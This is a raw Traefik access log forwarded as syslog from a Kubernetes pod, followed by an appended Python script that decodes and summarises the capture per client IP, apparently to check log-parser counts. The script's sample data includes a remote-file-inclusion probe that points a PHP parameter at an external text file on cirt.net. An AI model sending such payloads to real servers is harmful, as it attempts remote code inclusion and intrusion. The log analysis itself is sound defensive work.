<14>1 2021-12-12T16:43:48.595967Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17625 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 18ms
<14>1 2021-12-12T16:43:48.697812Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17626 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 18ms
<14>1 2021-12-12T16:43:48.796526Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17627 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 18ms
<14>1 2021-12-12T16:43:48.894455Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿194.34.132.19 - - [12/Dec/2021:16:43:48 +0000] "GET / HTTP/1.1" 200 4646 "-" "-" 17628 "frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 17ms
<14>1 2021-12-12T16:43:48.959838Z windell traefik traefik-9f79b8c4c-mlvlm - [kubernetes pod_name="traefik-9f79b8c4c-mlvlm" namespace_name="kube-system" pod_id="7818a1e6-eacd-476e-b6e0-e39d82f0432b" host="windell" container_name="traefik" docker_id="ee98498d62970b7ae9c8d91baca7bf5558922c5da490113b814883601a0306bd" container_hash="docker.io/library/traefik@sha256:ea0aa8832bfd08369166baecd40b35fc58979df8f5dc5182e4e63ee6adbe66db" container_image="docker.io/library/traefik:2.2.11"] ﻿10.42.1.1 - - [12/Dec/2021:16:43:48 +0000] "GET /ping HTTP/1.1" 200 2 "-" "-" 17629 "ping@internal" "-" 0ms
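As an added example (not code from the original post or from the CrowdSec or Fluent Bit projects), a Python decoder for a raw `nc -u -l 8514` capture like the one above: it cuts the run-together UDP datagrams at each `<PRI>1` header, parses the RFC 5424 header and the `[kubernetes ...]` structured data, strips the UTF-8 byte-order mark that the raw datagrams carry in front of the access-log line, and parses the Traefik common-log-format line, keeping lines whose status and size are `-` (as in the wapiti sample) apart from lines with a numeric status. The sample datagrams are constructed from the capture above with shortened structured data.

```python
"""Decode a raw UDP syslog capture, as printed by `nc -u -l 8514` in the post,
into RFC 5424 messages and the Traefik access-log lines they carry."""
import re
from collections import Counter, defaultdict

# Constructed sample modelled on the capture above (structured data shortened).
# nc prints consecutive datagrams with no separator, and every MSG begins with a
# UTF-8 BOM (U+FEFF), which RFC 5424 permits for UTF-8 payloads.
SAMPLE = (
    '<14>1 2021-12-12T16:43:47.848158Z windell traefik traefik-9f79b8c4c-mlvlm - '
    '[kubernetes pod_name="traefik-9f79b8c4c-mlvlm" container_name="traefik"] \ufeff10.42.1.1 - - '
    '[12/Dec/2021:16:43:47 +0000] "GET /ping HTTP/1.1" 200 2 "-" "-" 17623 "ping@internal" "-" 0ms'
    '<14>1 2021-12-12T16:43:48.267831Z windell traefik traefik-9f79b8c4c-mlvlm - '
    '[kubernetes pod_name="traefik-9f79b8c4c-mlvlm" container_name="traefik"] \ufeff194.34.132.19 - - '
    '[12/Dec/2021:16:43:48 +0000] "GET /zqxjFASpplgsBq.html HTTP/1.1" 404 153 "-" "-" 17624 '
    '"frigg-public-routes-22735e324d6d7eb80733@kubernetescrd" "http://10.42.1.239:80" 23ms'
    '<14>1 2021-12-12T16:19:46.000000Z windell traefik traefik-9f79b8c4c-mlvlm - '
    '[kubernetes pod_name="traefik-9f79b8c4c-mlvlm" container_name="traefik"] \ufeff194.34.132.19 - - '
    '[12/Dec/2021:16:19:46 +0000] "GET /page.php?id=http://cirt.net/rfiinc.txt? HTTP/1.1" - - "-" "-" '
    '14970 "-" "-" 0ms'
)

# RFC 5424 header: <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID, then SD and MSG.
HEADER = re.compile(
    r'^<(?P<pri>\d{1,3})>(?P<ver>\d+) (?P<ts>\S+) (?P<host>\S+) (?P<app>\S+) '
    r'(?P<procid>\S+) (?P<msgid>\S+) (?P<rest>.*)$', re.S)
# One SD-ELEMENT with its SD-PARAMs; '"', '\' and ']' inside a value are backslash-escaped.
SD_ELEM = re.compile(r'\[(?P<id>[^ \]]+)(?P<params>(?: [^=\]]+="(?:[^"\\]|\\.)*")*)\]')
SD_PARAM = re.compile(r' (?P<k>[^=\]]+)="(?P<v>(?:[^"\\]|\\.)*)"')
# Traefik common log format; status and size are '-' when no response was written.
CLF = re.compile(
    r'^(?P<client>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}|-) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<count>\d+) "(?P<router>[^"]*)" '
    r'"(?P<backend>[^"]*)" (?P<duration>\d+)ms$')


def split_datagrams(capture):
    """Cut the run-together capture just before each <PRI>VERSION."""
    return [p for p in re.split(r'(?=<\d{1,3}>\d+ )', capture) if p]


def parse_rfc5424(datagram):
    """Return header fields, structured data and the MSG (BOM stripped), or None."""
    m = HEADER.match(datagram)
    if not m:
        return None
    pri, rest, sd = int(m['pri']), m['rest'], {}
    if rest.startswith('-'):          # NILVALUE: no structured data
        rest = rest[1:]
    while (e := SD_ELEM.match(rest)):
        sd[e['id']] = {p['k']: p['v'].replace('\\"', '"').replace('\\]', ']')
                       for p in SD_PARAM.finditer(e['params'])}
        rest = rest[e.end():]
    # MSG follows one SP; drop the BOM, which a pattern anchored on the client IP
    # would otherwise see as the first character of the line.
    msg = rest[1:] if rest.startswith(' ') else rest
    return {'facility': pri >> 3, 'severity': pri & 7, 'timestamp': m['ts'],
            'hostname': m['host'], 'appname': m['app'], 'procid': m['procid'],
            'msgid': m['msgid'], 'sd': sd, 'msg': msg.lstrip('\ufeff')}


def parse_traefik_clf(line):
    """Parse one Traefik CLF line; None when it does not fit the format."""
    m = CLF.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = None if rec['status'] == '-' else int(rec['status'])
    rec['size'] = None if rec['size'] == '-' else int(rec['size'])
    rec['count'] = int(rec['count'])
    rec['duration_ms'] = int(rec.pop('duration'))
    return rec


def summarize(capture):
    """Per client IP: lines received, lines without a status code, status histogram."""
    out = defaultdict(lambda: {'requests': 0, 'no_status': 0, 'statuses': Counter()})
    for dg in split_datagrams(capture):
        hdr = parse_rfc5424(dg)
        rec = parse_traefik_clf(hdr['msg']) if hdr and hdr['appname'] == 'traefik' else None
        if rec is None:
            continue                  # not a Traefik access line we can read
        s = out[rec['client']]
        s['requests'] += 1
        if rec['status'] is None:
            s['no_status'] += 1
        else:
            s['statuses'][rec['status']] += 1
    return dict(out)
```

Run `summarize` over the real capture file to see, per client, how many access lines arrive without a status code versus with one, before comparing against the parser and bucket counters that `cscli metrics` reports.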